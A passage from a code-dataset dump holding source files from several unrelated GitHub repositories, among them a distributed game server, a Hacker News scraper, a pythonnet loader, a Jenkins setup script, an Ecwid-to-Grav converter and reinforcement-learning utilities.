float(x.partition(';')[0]))\n\n senddata = []\n for command in data:\n if self.game.update_grid(command):\n senddata.append(command)\n log.write(command + '\\n')\n else:\n log.write(\"invalid update\" + '\\n')\n\n # Send to clients\n data = 'end'.join(senddata) + \"endupdate\"\n #print(\"Data that will be broadcasted: \", data)\n self.broadcast_clients(data.encode('utf-8'))\n\n # Some other handling stuff\n self.tickdata = b''\n #print(\"Finished sending my grid to other servers.\")\n\n else:\n # got a message\n for client in readable:\n # If server side, then new connection\n if client is self.sock:\n connection, client_address = self.sock.accept()\n self.create_player(connection)\n self.connections.append(connection)\n # start the game if this is the first player to join\n if not self.game_started:\n self.game_started = True\n # Else we have some data\n else:\n try:\n data = client.recv(64)\n #print(\"SERVER RECEIVED\", data)\n if data:\n self.tickdata += ((str(time.time())+';').encode('utf-8') + data)\n else: #connection has closed\n self.remove_client(client)\n except ConnectionResetError:\n pass\n\n\n # Handling stopping servers and closing connections.\n except KeyboardInterrupt:\n self.power_down()\n break\n\n # always power down for right now\n print(\"Server shutting down\")\n log.close()\n self.power_down()\n\n def start_peer_receiving(self):\n \"\"\"Thread for doing moves + send moves\"\"\"\n Thread(target=self.read_peer_ports, daemon = True).start()\n\n def read_peer_ports(self):\n \"\"\" Read the sockets for new peer connections or peer game updates.\"\"\"\n\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # Wait for a connection\n readable, writable, errored = select.select(self.peer_connections, [], [], self.check_alive/self.speedup)\n if not readable and not writable and not errored:\n # timeout is reached\n pass\n\n else:\n # got a message\n for peer in readable:\n # If server side, then new peer connection\n if peer is self.peer_sock:\n connection, peer_address = self.peer_sock.accept()\n print (\"Peer connected from {}\".format(peer_address))\n if connection not in self.peer_connections:\n self.peer_connections.append(connection)\n new_peer_message = \"NEW_PEER|\" + str()\n self.peer_queue.put((connection,))\n # Else we have some data from a peer\n else:\n try:\n data = peer.recv(1028)\n if data == b'getgrid':\n self.peer_queue.put(('getgrid', peer))\n continue\n if (data.decode('utf-8').startswith('WIN PLAYERS')) or (data.decode('utf-8').startswith('WIN DRAGONS')):\n self.life_time = 0\n if data:\n # Putting data in queue so it can be read by server\n #print(self.peer_port, \" received \", data)\n self.server_queue.put(data)\n else: #connection has closed\n self.remove_peer(peer)\n except ConnectionResetError:\n self.remove_peer(peer)\n\n # Handling stopping servers and closing connections.\n except KeyboardInterrupt:\n self.power_down()\n break\n\n # always power down for right now\n print(\"Peer server shutting down\")\n time.sleep(1/self.speedup)\n self.peer_power_down()\n\n\nif __name__ == '__main__':\n import sys\n client_port = int(sys.argv[1])\n peer_port = int(sys.argv[2])\n distr_port = int(sys.argv[3])\n run_time = int(sys.argv[4])\n check_alive = int(sys.argv[5])\n server_id = int(sys.argv[6])\n lat = int(sys.argv[7])\n lng = int(sys.argv[8])\n num_dragons = int(sys.argv[9])\n\n # Setup a new server\n s = Server(port=client_port, peer_port=peer_port, life_time=run_time, check_alive=check_alive,\n ID=server_id, lat=lat, lng=lng, num_dragons=num_dragons)\n print(\"Created server process \" + str(client_port))\n # tell the distributor you exist\n s.tell_distributor(distr_port)\n # let the server handle all incoming messages\n s.read_ports()\n print(\"Server closed on port \" + str(client_port))\n"
},
{
"alpha_fraction": 0.41928720474243164,
"alphanum_fraction": 0.44863730669021606,
"avg_line_length": 19.7391300201416,
"blob_id": "c9414f3e7f09a1d315918f1bb77734f08250291d",
"content_id": "7bd6f27d8346a6c63d9be8377ba68b0dc707ddae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/Arena.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAuthor: Kevin Rojer & Ali Almoshawah\nVersion: 1.0\nDate: 30 November 2018\n\"\"\"\n\nclass Arena:\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def draw_grid(self):\n for y in range(self.height):\n for x in range(self.width):\n #(\"%%-%ds\" % 2 % '.', end=\"\")\n print(\"{}{}\".format(\".\", 2 * \" \" ), end=\"\")\n print()\n\n\nif __name__ == '__main__':\n g = Arena(25,25)\n g.draw_grid()\n"
}
] | 9 |
shatternox/web-scraper
|
https://github.com/shatternox/web-scraper
|
6a0f0c945fc4e408924edbe2554e88646e0712c7
|
142daa52078f78683c62b3a6898de24bc7dd8375
|
15562b9ab1559c9cd06e1c51baedd9bb83d0e46c
|
refs/heads/master
| 2022-11-21T02:55:20.685349 | 2020-07-26T03:25:44 | 2020-07-26T03:25:44 | 278,882,726 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5882353186607361,
"alphanum_fraction": 0.5907384157180786,
"avg_line_length": 12.735849380493164,
"blob_id": "8bed30bf22ef3e7f64cdb988df6817980eaa0f23",
"content_id": "055aaeb63f1db2e3d76c3bdb5b59c216bad59f23",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 799,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 53,
"path": "/hacker-news.py",
"repo_name": "shatternox/web-scraper",
"src_encoding": "UTF-8",
"text": "import requests\r\nimport bs4\r\n\r\nr = requests.get(\"https://thehackernews.com/\")\r\nsoup = bs4.BeautifulSoup(r.text, 'lxml')\r\n\r\n\r\ntitle = []\r\n\r\nfor x in soup.select('.home-title'):\r\n\r\n\ttitle.append(x.text)\r\n\r\n\r\narticle = []\r\n\r\nfor x in soup.select('.home-desc'):\r\n\r\n\tarticle.append(x.text)\r\n\r\n\r\nimage_title = []\r\n\r\nfor x in soup.select('.home-img-src'):\r\n\r\n\timage_title.append(x['alt'])\r\n\r\n\r\nimage_link = []\r\n\r\nfor x in soup.select('.home-img-src'):\r\n\r\n\timage_link.append(x['data_src'])\r\n\r\n\r\n# Download all the image in the page\r\n\r\nfor x in range(len(image_link)):\r\n\r\n\tlink = requests.get(image_link[x])\r\n\r\n\tf = open(image_title[x] + '.jpg','wb')\r\n\r\n\tf.write(link.content)\r\n\r\n\tf.close()\r\n\r\n\r\narticle_link = []\r\n\r\nfor x in soup.select('.story-link'):\r\n\r\n\tarticle_link.append(x['href'])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
GuillaumeSalha/ensae_teaching_cs
|
https://github.com/GuillaumeSalha/ensae_teaching_cs
|
b3132bb3e3c2203a4c7f1f632831009db11cfab9
|
734263908825dd03a771ad013edeb591ca9ff0b6
|
b8a347626f0cb32eb32d4c5c04cff3119b80e004
|
refs/heads/master
| 2021-01-11T15:57:13.219104 | 2017-01-20T21:01:18 | 2017-01-20T21:01:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6073132157325745,
"alphanum_fraction": 0.6167076230049133,
"avg_line_length": 37.22652053833008,
"blob_id": "b3d8c6b3f4b2b14b9c703ce9778a2e11cdaff34b",
"content_id": "1a7e1b3916184888c62faf5b0644ae725596f9ac",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6932,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 181,
"path": "/src/ensae_teaching_cs/pythonnet/__init__.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "#*-* coding: utf-8 -*-\n\"\"\"\n@file\n@brief Uses `pythonnet <https://github.com/sdpython/pythonnet>`_.\n\n.. faqref::\n :tag: windows\n :title: Unhandled Exception: System.IO.FileLoadException when using Python.Runtime.dll with Python 3.5)\n\n When running for the first time on Python 3.5, the following error came up::\n\n Unhandled Exception: System.IO.FileLoadException: Could not load file or assembly 'file:///<apath>\\Python.Runtime.dll' or one of its dependencies.\n Operation is not supported. (Exception from HRESULT: 0x80131515) ---> System.NotSupportedException: An attempt was made to load an assembly\n from a network location which would have caused the assembly to be sandboxed in previous versions of the .NET Framework.\n This release of the .NET Framework does not enable CAS policy by default, so this load may be dangerous.\n If this load is not intended to sandbox the assembly,\n please enable the loadFromRemoteSources switch.\n See http://go.microsoft.com/fwlink/?LinkId=155569 for more information.\n --- End of inner exception stack trace ---\n at System.Reflection.RuntimeAssembly._nLoad(AssemblyName fileName, String codeBase, Evidence assemblySecurity,\n RuntimeAssembly locationHint, StackCrawlMark& stackMark, IntPtr pPrivHostBinder, Boolean throwOnFileNotFound,\n Boolean forIntrospection, Boolean suppressSecurityChecks)\n at System.Reflection.RuntimeAssembly.InternalLoadAssemblyName(AssemblyName assemblyRef,\n Evidence assemblySecurity, RuntimeAssembly reqAssembly, StackCrawlMark& stackMark,\n IntPtr pPrivHostBinder, Boolean throwOnFileNotFound, Boolean forIntrospection, Boolean suppressSecurityChecks)\n at System.Reflection.RuntimeAssembly.InternalLoadFrom(String assemblyFile, Evidence securityEvidence, Byte[] hashValue,\n AssemblyHashAlgorithm hashAlgorithm, Boolean forIntrospection, Boolean suppressSecurityChecks, StackCrawlMark& stackMark)\n at System.Reflection.Assembly.LoadFrom(String assemblyFile)\n at clrModule.PyInit_clr()\n\n In that case, I suggest to get the source at\n `sdpython/pythonnet <https://github.com/sdpython/pythonnet>`_\n and to compile them with VS 2015 on your machine.\n It will import the missing DLL which I'm still trying to find out.\n The DLL was compiled on an Azure Virtual Machine.\n\"\"\"\n\nimport sys\nimport platform\nimport os\n\nif sys.platform.startswith(\"win\"):\n ver = sys.version_info\n arch = platform.architecture()[0]\n if ver[:2] == (3, 5):\n if \"64\" in arch:\n from .py35x64 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n elif ver[:2] == (3, 4):\n if \"64\" in arch:\n from .py34x64 import clr\n elif arch == \"32bit\":\n from .py34 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n elif ver[:2] == (3, 3):\n if \"64\" in arch:\n from .py33x64 import clr\n elif arch == \"32bit\":\n from .py33 import clr\n else:\n raise ImportError(\n \"unable to import pythonnet for this architecture \" +\n str(arch))\n else:\n raise ImportError(\n \"unable to import pythonnet for this version of python \" +\n str(ver))\n\n\ndef vocal_synthesis(text, lang=\"fr-FR\", voice=\"\", filename=\"\"):\n \"\"\"\n Utilise la synthèse vocale de Windows\n\n @param text text à lire\n @param lang langue\n @param voice nom de la voix (vide si voix par défaut)\n @param filename nom de fichier pour sauver le résultat au format wav (vide sinon)\n\n .. exref::\n :title: Utiliser une DLL implémentée en C#\n :tag: Technique\n\n .. index:: C#,DLL\n\n Le code de la DLL est le suivant. Il a été compilé sous forme de DLL.\n\n ::\n\n namespace ENSAE.Voice\n {\n public static class Speech\n {\n public static void VocalSynthesis(string text, string culture, string filename, string voice)\n {\n SpeechSynthesizer synth = new SpeechSynthesizer();\n\n synth.SelectVoiceByHints(VoiceGender.Neutral, VoiceAge.NotSet, 1, new CultureInfo(culture));\n\n if (!string.IsNullOrEmpty(filename))\n synth.SetOutputToWaveFile(filename);\n if (!string.IsNullOrEmpty(voice))\n synth.SelectVoice(voice);\n\n synth.Speak(text);\n }\n }\n }\n\n Pour l'utiliser, il faut utiliser l'instruction :\n\n ::\n\n from ensae_teaching_cs.pythonnet import clr\n from clr import AddReference\n AddReference(\"ENSAE.Voice\")\n\n Si le programme répond qu'il ne trouve pas le fichier, il suffit\n d'inclure de la répertoire où se trouve la DLL dans la liste ``sys.path``.\n Ensuite on écrit simplement :\n\n ::\n\n from ENSAE.Voice import Speech\n Speech.VocalSynthesis(text, lang, voice, filename)\n\n Il faut voir le notebook :ref:`pythoncsharprst`.\n \"\"\"\n if \"ENSAE.Voice\" not in sys.modules:\n if not sys.platform.startswith(\"win\"):\n raise NotImplementedError(\"only available on Windows\")\n\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n\n from clr import AddReference\n\n try:\n AddReference(\"ENSAE.Voice\")\n except Exception:\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n if path not in sys.path:\n sys.path.append(path)\n AddReference(\"ENSAE.Voice\")\n\n from ENSAE.Voice import Speech\n Speech.VocalSynthesis(text, lang, voice, filename)\n\n\ndef import_magic_cs():\n \"\"\"\n import the C# DLL which helps doing C# in a notebooks\n\n @return pointer on C# static class\n \"\"\"\n if \"MagicJupyter\" not in sys.modules:\n if not sys.platform.startswith(\"win\"):\n raise NotImplementedError(\"only available on Windows\")\n\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n\n from clr import AddReference\n\n try:\n AddReference(\"MagicJupyter\")\n except Exception:\n path = os.path.abspath(os.path.split(__file__)[0])\n path = os.path.join(path, \"csdll\")\n if path not in sys.path:\n sys.path.append(path)\n AddReference(\"MagicJupyter\")\n\n from MagicJupyter import MagicCS\n return MagicCS\n"
},
{
"alpha_fraction": 0.6740220785140991,
"alphanum_fraction": 0.6780341267585754,
"avg_line_length": 32.233333587646484,
"blob_id": "2b1670730fd2d26a1d7104132837998776752020",
"content_id": "f767edb40f4aee4542a5e9e54c224e0c7771577b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 997,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 30,
"path": "/jenkins_setup.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "\"\"\"\ncopy the documentation to the website\n\"\"\"\nimport sys\nimport os\nsys.path.append(os.path.abspath(\"../pyquickhelper/src\"))\nsys.path.append(os.path.abspath(\"../pyensae/src\"))\nsys.path.append(os.path.abspath(\"../ensae_teaching_cs/src\"))\nsys.path.append(os.path.abspath(\"../pymyinstall/src\"))\n\nfrom pyquickhelper.loghelper import fLOG\nfrom pyquickhelper.jenkinshelper import JenkinsExt\nfrom ensae_teaching_cs.automation.jenkins_helper import setup_jenkins_server, engines_default\n\nfLOG(OutputPrint=True)\nfLOG(\"start\")\n\nimport keyring\nuser = keyring.get_password(\"jenkins\", os.environ[\"COMPUTERNAME\"] + \"user\")\npwd = keyring.get_password(\"jenkins\", os.environ[\"COMPUTERNAME\"] + \"pwd\")\n\n\njs = JenkinsExt('http://localhost:8080/', user, pwd,\n fLOG=fLOG, engines=engines_default())\n\nsetup_jenkins_server(js,\n overwrite=True,\n delete_first=False,\n location=\"d:\\\\jenkins\\\\pymy\",\n disable_schedule=False)\n"
},
{
"alpha_fraction": 0.8591549396514893,
"alphanum_fraction": 0.8732394576072693,
"avg_line_length": 7.875,
"blob_id": "04d6e313eae849143ec4ea83d5da7dea3d872d57",
"content_id": "af9496ecf8592bddd18dcef88b49e2d1d9ca8022",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 71,
"license_type": "permissive",
"max_line_length": 12,
"num_lines": 8,
"path": "/requirements2.txt",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "bayespy\ncloudpickle\ndask\nggplot\nmpld3\nscikit-learn\nseaborn\nstatsmodels\n"
},
{
"alpha_fraction": 0.9245283007621765,
"alphanum_fraction": 0.9245283007621765,
"avg_line_length": 9.800000190734863,
"blob_id": "6896893a71c639ba6b6de76e0db99d9217f192ed",
"content_id": "34c3a5580b9f59e93e6c368ecbb64fbdae0f6f05",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 5,
"path": "/requirements_ext.txt",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "pyquickhelper\npyensae\npymmails\npymyinstall\npyrsslocal"
},
{
"alpha_fraction": 0.8126801252365112,
"alphanum_fraction": 0.8126801252365112,
"avg_line_length": 33.70000076293945,
"blob_id": "358ca215a0a84a62dee14e0706a26b77ebe0f5ae",
"content_id": "1a0f4e562273c2e5e3267fdf5f5bc8292de3a4b3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 347,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 10,
"path": "/src/ensae_teaching_cs/automation/__init__.py",
"repo_name": "GuillaumeSalha/ensae_teaching_cs",
"src_encoding": "UTF-8",
"text": "\"\"\"\n@file\n@brief Shortcuts for automation\n\"\"\"\n\nfrom .jenkins_helper import setup_jenkins_server, default_jenkins_jobs\nfrom .ftp_publish_helper import publish_documentation, publish_teachings_to_web\nfrom .notebook_test_helper import execute_notebooks\nfrom .modules_documentation import rst_table_modules\nfrom .module_backup import ftp_list_modules\n"
}
] | 5 |
garethbilaney/toGRAVConverter
|
https://github.com/garethbilaney/toGRAVConverter
|
e1c6b27d7b3213bb8f1a069acca20d2b65846331
|
d3da7de6e685362a5245b4715ecabdeaaf8091c4
|
0e2ab79bb37dba58bd2bc7c4a24768ebeba53e5e
|
refs/heads/master
| 2022-11-07T02:59:05.933525 | 2020-06-23T17:38:40 | 2020-06-23T17:38:40 | 268,150,646 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4618591070175171,
"alphanum_fraction": 0.4747811555862427,
"avg_line_length": 32.31944274902344,
"blob_id": "7c22b6d03f8161f53d801dedb7a6f3a547d1a497",
"content_id": "ee6cae3d5ea62fc4ae7850ef1c92655da7af0296",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2399,
"license_type": "permissive",
"max_line_length": 168,
"num_lines": 72,
"path": "/ecwid/ecwid.py",
"repo_name": "garethbilaney/toGRAVConverter",
"src_encoding": "UTF-8",
"text": "# ecwid csv file to grav pages\n\n\n# pip install urllib3\n\nimport csv, sys, os, io, codecs, urllib, requests\n\ndef getIMG(url, path, name):\n thisPath = path + '/' + name + '.jpg'\n print(thisPath)\n urllib.urlretrieve(url, thisPath)\n r = requests.get(url)\n\nwith open('import.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=';')\n # os.mkdir('toGrav')\n\n\n\n\n for line in csv_reader:\n\n\n # file handler\n path = 'import/' + line[23][22:].split(\"p/\")[0].lower() #replace(\"p/\", \"p\").replace(\"/\", \"-\")\n if not os.path.exists(path):\n os.makedirs (path)\n # Create file\n print(path)\n\n # download product image\n if(line[6].endswith('.jpg')):\n getIMG(line[6], path, line[0].lower().replace(\" \", \"-\").replace(\"/\", \"-\").replace(\",\", \"-\"))\n\n header = '---' + '\\n' + 'title: ' + line[0] + '\\n' + \"sku: \" + line[1] + '\\n' + 'published: true' + '\\n' + 'product: true' + '\\n' + '---' + '\\n'\n if(line[6].endswith('.jpg')):\n content = header + '# ' + line[0] + '\\n\\n' + '![' + line[0] + '](' + line[0].lower().replace(\" \", \"-\").replace(\"/\", \"-\") + '.jpg)' + '\\n\\n' + line[2] + '\\n'\n else:\n content = header + '# ' + line[0] + '\\n\\n' + line[2] + '\\n'\n path = path + '/blog_overview.en.md'\n\n with codecs.open(path, mode=\"w\", encoding=\"utf-8\") as f:\n f.write(unicode(content, \"utf-8\"))\n\n #def getJPG(url, filepath, filename):\n # jpgpath = filepath + filename + '.jpg'\n # urllib3.request.urlretrieve(url,jpgpath)\n #file = codecs.open('path','w','utf-8')\n #file.write(u'\\ufeff')\n #file.close()\n\n\n #MD = os.open(path, os.O_RDWR|os.O_CREAT)\n #header = '---' + '\\n' + 'title: ' + line[0] + '\\n' + \"sku: \" + line[1] + '\\n' + 'published: true' + '\\n' + 'product: true' + '\\n' + '---' + '\\n'\n #content = header + '# ' + line[0] + '\\n\\n' + line[2] + '\\n'\n #content = unicode(content, \"utf-8\")\n # thisLine = unicode.encode(content)\n #numBytes = os.write(MD, content)\n #os.close(MD)\n\n\n # Debug\n\n # print('---')\n # print('title: ' + line[0])\n # print(\"sku: \" + line[1])\n # print('published: true')\n # print('product: true')\n # print('---')\n # content\n # print(\"# \" + line[0])\n # print(line[2])\n"
}
] | 1 |
Scitator/Run-Skeleton-Run
|
https://github.com/Scitator/Run-Skeleton-Run
|
0f74e04bdce00dc505720f533490424892c3bf9a
|
c8aefbc448f2d78699355eb843c75a78ac5132a4
|
a5033285dc07ff50712bc93ea52d46396e4aef65
|
refs/heads/master
| 2022-02-24T20:28:02.807560 | 2019-10-15T19:51:49 | 2019-10-15T19:51:49 | 110,868,459 | 95 | 18 |
MIT
| 2017-11-15T18:04:29 | 2018-08-31T03:55:18 | 2018-01-22T15:20:52 |
Python
|
[
{
"alpha_fraction": 0.624365508556366,
"alphanum_fraction": 0.6300056576728821,
"avg_line_length": 28.549999237060547,
"blob_id": "9ca13ac7934d7890e3e31db703b2b2ed4e76ffff",
"content_id": "2aee7e8efd9640d1fd1e64eb943cd60a3cafceee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 60,
"path": "/common/loss.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport torch\nimport torch.nn as nn\n\n\ndef create_linear_decay_fn(initial_value, final_value, max_step):\n def decay_fn(step):\n relative = 1. - step / max_step\n return initial_value * relative + final_value * (1. - relative)\n\n return decay_fn\n\n\ndef create_cycle_decay_fn(initial_value, final_value, cycle_len, num_cycles):\n max_step = cycle_len * num_cycles\n\n def decay_fn(step):\n relative = 1. - step / max_step\n relative_cosine = 0.5 * (np.cos(np.pi * np.mod(step, cycle_len) / cycle_len) + 1.0)\n return relative_cosine * (initial_value - final_value) * relative + final_value\n\n return decay_fn\n\n\ndef create_decay_fn(decay_type, **kwargs):\n if decay_type == \"linear\":\n return create_linear_decay_fn(**kwargs)\n elif decay_type == \"cycle\":\n return create_cycle_decay_fn(**kwargs)\n else:\n raise NotImplementedError()\n\n\nclass QuadricLinearLoss(nn.Module):\n def __init__(self, clip_delta):\n super(QuadricLinearLoss, self).__init__()\n self.clip_delta = clip_delta\n\n def forward(self, y_pred, y_true, weights):\n td_error = y_true - y_pred\n td_error_abs = torch.abs(td_error)\n quadratic_part = torch.clamp(td_error_abs, max=self.clip_delta)\n linear_part = td_error_abs - quadratic_part\n loss = 0.5 * quadratic_part ** 2 + self.clip_delta * linear_part\n loss = torch.mean(loss * weights)\n return loss\n\nlosses = {\n \"mse\": nn.MSELoss,\n \"quadric-linear\": QuadricLinearLoss\n}\n\n\ndef create_loss(args):\n if args.loss_type == \"mse\":\n return nn.MSELoss()\n elif args.loss_type == \"quadric-linear\":\n return QuadricLinearLoss(clip_delta=args.clip_delta)\n else:\n raise NotImplementedError()\n"
},
{
"alpha_fraction": 0.5301932096481323,
"alphanum_fraction": 0.5567632913589478,
"avg_line_length": 30.846153259277344,
"blob_id": "c9c99f786923f8efde7121d31c1329959251448d",
"content_id": "0b8473a20147cf4ec1373b8ecc57f514f4033a87",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1656,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 52,
"path": "/baselines/baselines_common/mpi_moments.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nimport numpy as np\nfrom baselines.baselines_common import zipsame\n\n\ndef mpi_moments(x, axis=0):\n x = np.asarray(x, dtype='float64')\n newshape = list(x.shape)\n newshape.pop(axis)\n n = np.prod(newshape, dtype=int)\n totalvec = np.zeros(n * 2 + 1, 'float64')\n addvec = np.concatenate([x.sum(axis=axis).ravel(),\n np.square(x).sum(axis=axis).ravel(),\n np.array([x.shape[axis]], dtype='float64')])\n MPI.COMM_WORLD.Allreduce(addvec, totalvec, op=MPI.SUM)\n sum = totalvec[:n]\n sumsq = totalvec[n:2 * n]\n count = totalvec[2 * n]\n if count == 0:\n mean = np.empty(newshape);\n mean[:] = np.nan\n std = np.empty(newshape);\n std[:] = np.nan\n else:\n mean = sum / count\n std = np.sqrt(np.maximum(sumsq / count - np.square(mean), 0))\n return mean, std, count\n\n\ndef test_runningmeanstd():\n comm = MPI.COMM_WORLD\n np.random.seed(0)\n for (triple, axis) in [\n ((np.random.randn(3), np.random.randn(4), np.random.randn(5)), 0),\n ((np.random.randn(3, 2), np.random.randn(4, 2), np.random.randn(5, 2)), 0),\n ((np.random.randn(2, 3), np.random.randn(2, 4), np.random.randn(2, 4)), 1),\n ]:\n\n x = np.concatenate(triple, axis=axis)\n ms1 = [x.mean(axis=axis), x.std(axis=axis), x.shape[axis]]\n\n ms2 = mpi_moments(triple[comm.Get_rank()], axis=axis)\n\n for (a1, a2) in zipsame(ms1, ms2):\n print(a1, a2)\n assert np.allclose(a1, a2)\n print(\"ok!\")\n\n\nif __name__ == \"__main__\":\n # mpirun -np 3 python <script>\n test_runningmeanstd()\n"
},
{
"alpha_fraction": 0.49325764179229736,
"alphanum_fraction": 0.5180979371070862,
"avg_line_length": 21.725807189941406,
"blob_id": "4c31de8b5786f85d8726d86f0a1db4165eda8825",
"content_id": "6def0c92689fab558e06ccf6d879eb61827470cb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1409,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 62,
"path": "/baselines/baselines_common/console_util.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nfrom contextlib import contextmanager\nimport numpy as np\nimport time\n\n\n# ================================================================\n# Misc\n# ================================================================\n\ndef fmt_row(width, row, header=False):\n out = \" | \".join(fmt_item(x, width) for x in row)\n if header: out = out + \"\\n\" + \"-\" * len(out)\n return out\n\n\ndef fmt_item(x, l):\n if isinstance(x, np.ndarray):\n assert x.ndim == 0\n x = x.item()\n if isinstance(x, float):\n rep = \"%g\" % x\n else:\n rep = str(x)\n return \" \" * (l - len(rep)) + rep\n\n\ncolor2num = dict(\n gray=30,\n red=31,\n green=32,\n yellow=33,\n blue=34,\n magenta=35,\n cyan=36,\n white=37,\n crimson=38\n)\n\n\ndef colorize(string, color, bold=False, highlight=False):\n attr = []\n num = color2num[color]\n if highlight: num += 10\n attr.append(str(num))\n if bold: attr.append('1')\n return '\\x1b[%sm%s\\x1b[0m' % (';'.join(attr), string)\n\n\nMESSAGE_DEPTH = 0\n\n\n@contextmanager\ndef timed(msg):\n global MESSAGE_DEPTH # pylint: disable=W0603\n print(colorize('\\t' * MESSAGE_DEPTH + '=: ' + msg, color='magenta'))\n tstart = time.time()\n MESSAGE_DEPTH += 1\n yield\n MESSAGE_DEPTH -= 1\n print(colorize('\\t' * MESSAGE_DEPTH + \"done in %.3f seconds\" % (time.time() - tstart),\n color='magenta'))\n"
},
{
"alpha_fraction": 0.4756229817867279,
"alphanum_fraction": 0.5048754215240479,
"avg_line_length": 23.289474487304688,
"blob_id": "1d79b9cf5a3a9d89d4df50d46784a0d07e787f4e",
"content_id": "59fda0e3688a4f4a2bef957753b71f80faccda65",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 923,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 38,
"path": "/baselines/baselines_common/cg.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\ndef cg(f_Ax, b, cg_iters=10, callback=None, verbose=False, residual_tol=1e-10):\n \"\"\"\n Demmel p 312\n \"\"\"\n p = b.copy()\n r = b.copy()\n x = np.zeros_like(b)\n rdotr = r.dot(r)\n\n fmtstr = \"%10i %10.3g %10.3g\"\n titlestr = \"%10s %10s %10s\"\n if verbose:\n print(titlestr % (\"iter\", \"residual norm\", \"soln norm\"))\n\n for i in range(cg_iters):\n if callback is not None:\n callback(x)\n if verbose: print(fmtstr % (i, rdotr, np.linalg.norm(x)))\n z = f_Ax(p)\n v = rdotr / p.dot(z)\n x += v * p\n r -= v * z\n newrdotr = r.dot(r)\n mu = newrdotr / rdotr\n p = r + mu * p\n\n rdotr = newrdotr\n if rdotr < residual_tol:\n break\n\n if callback is not None:\n callback(x)\n if verbose:\n print(fmtstr % (i + 1, rdotr, np.linalg.norm(x))) # pylint: disable=W0631\n return x\n"
},
{
"alpha_fraction": 0.7021276354789734,
"alphanum_fraction": 0.7340425252914429,
"avg_line_length": 46,
"blob_id": "4fd48cdb3993bce7e7fcceb3f6cb78887b456404",
"content_id": "80b4ad792634b237485f8413298464857898fcbb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 94,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 2,
"path": "/setup_conda.sh",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nconda create -n opensim-rl -c kidzik opensim git python=3.5.2 anaconda -y\n"
},
{
"alpha_fraction": 0.5655650496482849,
"alphanum_fraction": 0.5746268630027771,
"avg_line_length": 29.25806427001953,
"blob_id": "44dbe1ab427463fdcfbcfba9539fed0d8bac5f3f",
"content_id": "6a61a4ed88d09f474a7c9aee44c45e7d0ee1a3d5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1876,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 62,
"path": "/common/random_process.py",
"repo_name": "Scitator/Run-Skeleton-Run",
"src_encoding": "UTF-8",
